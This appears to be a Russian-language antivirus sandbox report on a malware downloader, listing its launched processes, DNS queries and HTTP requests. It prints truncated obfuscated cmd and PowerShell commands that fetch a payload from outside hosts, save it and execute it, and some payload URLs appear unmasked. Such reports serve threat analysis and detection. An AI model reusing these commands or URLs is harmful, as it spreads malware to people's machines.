Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser...
Сетевая активность
Подключается к
- 'st###-castle.ir':80
- 'st###-castle.ir':443
- 'fl###matic.com':80
TCP
Запросы HTTP GET
- http://st###-castle.ir/99qjLtBg
- http://www.fl###matic.com/hvpdpLg
UDP
- DNS ASK ms###struin.com
- DNS ASK ve###orock.at
- DNS ASK st###-castle.ir
- DNS ASK fl###matic.com
- DNS ASK my###ock.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser.DRc$( fI;)(dnes.DRc$;...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $SHv='SJG';$kID='http://ms###struin.com/9JBTS8onb@http://www.veranorock.at/NLvsvsa4@http://stars-castle.ir/99qjLtBg@http://www.floramatic.com/hvpdpLg@http://myunlock.n...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml') DO %I -"
- '<SYSTEM32>\cmd.exe' /c assoc.ps1xml
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =SJG
